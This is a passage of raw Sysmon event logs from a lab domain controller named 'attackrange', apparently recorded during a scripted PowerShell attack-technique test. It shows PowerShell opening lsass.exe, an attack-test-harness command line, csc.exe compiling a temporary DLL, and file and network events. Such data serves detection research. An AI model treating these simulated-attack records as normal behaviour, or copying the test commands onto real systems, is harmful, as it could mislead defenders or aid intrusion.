22:55:45.911{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001697581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.911{05ADC7E1-70ED-603D-7488-00000000AD01}5596ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\T1086_PowerShell_Session_Creation_and_UseMD5=AB1EE9ED60E4CE2ACDC4A55CFBB7B7AC,SHA256=80F19B069CD4EA077A809D05DC366FA5E0A9022171D0086495D3A1534BACAF97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.599{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4D406D803CF2E76275FC88C68D4D60D,SHA256=71CDC04723BEA94131A342C3715BC79E6E17E71E1F29B71F6CB361073C9F238A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5A6EC5D9E89B4C70C1318460A21DE5A7,SHA256=0F5E53A3943D7FBE586F4F044D198AA57F8663E349274DEE68B83536DE022D57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.802{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.outMD5=FF040395AF0A2BDFF6B8A0A41EF9496C,SHA256=2D7E602408BD6C81A820BB3B7A79922083C7AD77066F45AF9CBA911FC8748CB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.802{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.cmdlineMD5=16C3DF1932296A53C7073B787AC209CD,SHA256=F67C3D51E5D0C6756F40E7E65C33E6117455B28E265C7DA87BE2CA89B708A983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.802{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.dllMD5=AF3271762D5786EC195ABEB19EA5689C,SHA256=A6FAC4963ED8DF5BA0D81B4C5BE290223D7FD798BA6497822F1F41E33519B203,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001697636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.786{05ADC7E1-70F2-603D-7788-00000000AD01}6552ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.0.csMD5=FB718D19F4C91D265609078FD8B12F5B,SHA256=C8612E37CBE1FB289864974C65AE8679D1AD656EAF43D265D3F277D28679692D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.786{05ADC7E1-70F2-603D-7888-00000000AD01}8260ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\CSC592915932CD14907B29FCB24DDD754AC.TMPMD5=9C8C7204F005C115FFEFB5922737C53E,SHA256=C4C227A03BD621025AEB66200636D46AD76A041CE9571C43FBE7830D1B6CDF43,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:46.786{05ADC7E1-70F2-603D-7888-00000000AD01}8260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.dll2021-03-01 22:55:46.693 23542300x80000000000000001697633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.786{05ADC7E1-70F2-603D-7888-00000000AD01}8260ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.786{05ADC7E1-70F2-603D-7888-00000000AD01}8260ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES36A.tmpMD5=D047AAC6EE49E6CE3BB77A97C0573398,SHA256=2D4C35017EC4BDEFE3A9116E16A50C46252B6ACB4A525F3B0C8B9F0D7E5FFBFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-70F2-603D-7988-00000000AD01}8500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES36A.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F2-603D-7988-00000000AD01}8500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.774{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F2-603D-7988-00000000AD01}8500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.773{05ADC7E1-70F2-603D-7888-00000000AD01}82604100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{05ADC7E1-70F2-603D-7988-00000000AD01}8500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001697623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.773{05ADC7E1-70F2-603D-7988-00000000AD01}8500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES36A.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\CSC592915932CD14907B29FCB24DDD754AC.TMP"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{05ADC7E1-70F2-603D-7888-00000000AD01}8260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.cmdline" 10341000x80000000000000001697622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F2-603D-7888-00000000AD01}8260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70F2-603D-7888-00000000AD01}8260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-70F2-603D-7788-00000000AD01}65528624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F2-603D-7888-00000000AD01}8260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+d680ce40(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+d680ce40(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d8357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64) 154100x80000000000000001697615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.704{05ADC7E1-70F2-603D-7888-00000000AD01}8260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.cmdline"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop} 11241100x80000000000000001697614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.693{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.cmdline2021-03-01 22:55:46.693 11241100x80000000000000001697613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:46.693{05ADC7E1-70F2-603D-7788-00000000AD01}6552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\qjia4v1n\qjia4v1n.dll2021-03-01 22:55:46.693 22542200x80000000000000001697612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.925{00000000-0000-0000-0000-000000000000}5596WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;<unknown process> 22542200x80000000000000001697611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.917{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 